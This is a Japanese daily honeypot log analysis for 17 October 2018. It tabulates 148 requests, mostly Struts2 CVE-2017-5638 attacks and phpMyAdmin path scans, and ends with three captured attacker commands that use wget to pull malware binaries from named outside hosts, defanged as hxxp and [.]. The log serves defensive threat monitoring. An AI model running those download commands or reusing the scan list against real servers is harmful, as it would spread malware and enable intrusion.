ハニーポットのログ分析(2018/10/17)
WOWhoneypotの2018/10/17(水) (運用134日目)の簡易分析です。
本日の総アクセス件数は 148件です。
主なアクセスは以下です。
・Apache Struts2の脆弱性S2-045(CVE-2017-5638)を突く攻撃:60件
・phpMyAdminの調査:39件
以下が全アクセスログです。
| 件数 | 日付 | 種別 | リクエスト |
| 60 | 2018-10-17 | Apache Struts2の脆弱性S2-045(CVE-2017-5638)を突く攻撃 | GET /index.action |
| 29 | 2018-10-17 | アクセス | GET / |
| 2 | 2018-10-17 | IISの脆弱性(CVE-2017-7269)を突く攻撃 | PROPFIND / |
| 2 | 2018-10-17 | phpMyAdminの調査 | GET /www/phpMyAdmin/index.php |
| 2 | 2018-10-17 | phpMyAdminの調査 | GET /claroline/phpMyAdmin/index.php |
| 2 | 2018-10-17 | 不正中継の調査 | CONNECT www.baidu.com:443 |
| 1 | 2018-10-17 | phpのWebShell設置の調査 | POST /xx.php |
| 1 | 2018-10-17 | phpのWebShell設置の調査 | POST /xw.php |
| 1 | 2018-10-17 | phpのWebShell設置の調査 | POST /wuwu11.php |
| 1 | 2018-10-17 | phpのWebShell設置の調査 | POST /w.php |
| 1 | 2018-10-17 | phpのWebShell設置の調査 | POST /s.php |
| 1 | 2018-10-17 | phpのWebShell設置の調査 | POST /sheep.php |
| 1 | 2018-10-17 | phpのWebShell設置の調査 | POST /db_session.init.php |
| 1 | 2018-10-17 | phpのWebShell設置の調査 | POST /db.init.php |
| 1 | 2018-10-17 | Mirai亜種 | POST / |
| 1 | 2018-10-17 | 不正中継の調査 | HEAD /newhome/img/logo.png |
| 1 | 2018-10-17 | XDebugの調査 | GET /?XDEBUG_SESSION_START=phpstorm |
| 1 | 2018-10-17 | phpMyAdminの調査 | GET /xampp/phpmyadmin/index.php |
| 1 | 2018-10-17 | phpMyAdminの調査 | GET /web/phpMyAdmin/index.php |
| 1 | 2018-10-17 | WebDAVの調査 | GET /webdav/ |
| 1 | 2018-10-17 | phpMyAdminの調査 | GET /typo3/phpmyadmin/index.php |
| 1 | 2018-10-17 | phpMyAdminの調査 | GET /tools/phpMyAdmin/index.php |
| 1 | 2018-10-17 | phpMyAdminの調査 | GET /pmd/index.php |
| 1 | 2018-10-17 | phpMyAdminの調査 | GET /pma-old/index.php |
| 1 | 2018-10-17 | phpMyAdminの調査 | GET /pmamy/index.php |
| 1 | 2018-10-17 | phpMyAdminの調査 | GET /pmamy2/index.php |
| 1 | 2018-10-17 | phpMyAdminの調査 | GET /PMA/index.php |
| 1 | 2018-10-17 | phpMyAdminの調査 | GET /pma/index.php |
| 1 | 2018-10-17 | phpMyAdminの調査 | GET /phpMyAdmin/phpMyAdmin/index.php |
| 1 | 2018-10-17 | phpMyAdminの調査 | GET /phpmyadmin/phpmyadmin/index.php |
| 1 | 2018-10-17 | phpMyAdminの調査 | GET /phpMyAdmin.old/index.php |
| 1 | 2018-10-17 | phpMyAdminの調査 | GET /phpmyadmin-old/index.php |
| 1 | 2018-10-17 | phpMyAdminの調査 | GET /phpMyAdmin/index.php |
| 1 | 2018-10-17 | phpMyAdminの調査 | GET /phpmyadmin/index.php |
| 1 | 2018-10-17 | phpMyAdminの調査 | GET /phpMyAdmin-4.4.0/index.php |
| 1 | 2018-10-17 | phpMyAdminの調査 | GET /phpmyadmin1/index.php |
| 1 | 2018-10-17 | phpMyAdminの調査 | GET /phpmyadmin0/index.php |
| 1 | 2018-10-17 | phpMyAdminの調査 | GET /phpma/index.php |
| 1 | 2018-10-17 | phpMyAdminの調査 | GET /phpAdmin/index.php |
| 1 | 2018-10-17 | phpMyAdminの調査 | GET /phpadmin/index.php |
| 1 | 2018-10-17 | phpMyAdminの調査 | GET /mysql/index.php |
| 1 | 2018-10-17 | phpMyAdminの調査 | GET /mysqladmin/index.php |
| 1 | 2018-10-17 | phpMyAdminの調査 | GET /mysql-admin/index.php |
| 1 | 2018-10-17 | phpMyAdminの調査 | GET /myadmin/index.php |
| 1 | 2018-10-17 | phpMyAdminの調査 | GET /myadmin2/index.php |
| 1 | 2018-10-17 | Tomcat管理ページへのブルートフォース攻撃 | GET /manager/html |
| 1 | 2018-10-17 | phpのWebShell設置の調査 | GET /index.php |
| 1 | 2018-10-17 | 不正中継の調査 | GET hxxp://www.baidu.com/ |
| 1 | 2018-10-17 | 不正中継の調査 | GET hxxp://110.249.212.46/testget?q=23333&port=80 |
| 1 | 2018-10-17 | phpMyAdminの調査 | GET /db/index.php |
| 1 | 2018-10-17 | phpMyAdminの調査 | GET /dbadmin/index.php |
| 1 | 2018-10-17 | phpMyAdminの調査 | GET /admin/PMA/index.php |
| 1 | 2018-10-17 | phpMyAdminの調査 | GET /admin/pma/index.php |
| 1 | 2018-10-17 | phpMyAdminの調査 | GET /admin/phpmyadmin/index.php |
| 1 | 2018-10-17 | phpMyAdminの調査 | GET /admin/phpmyadmin2/index.php |
| 1 | 2018-10-17 | phpMyAdminの調査 | GET /admin/mysql/index.php |
| 1 | 2018-10-17 | phpMyAdminの調査 | GET /admin/mysql2/index.php |
本日のドメイン名でのアクセスはありません。
本日のハンティングログは以下です。Struts2で検知しています。
15 2018-10-17 wget -c hxxp://wap.tfddos[.]net:57843/linux
10 2018-10-17 wget -c hxxp://123.249.88[.]147:8080/s2.6l
5 2018-10-17 wget -c hxxp://123.249.88[.]147:8080/2.6sqsq
以上です。
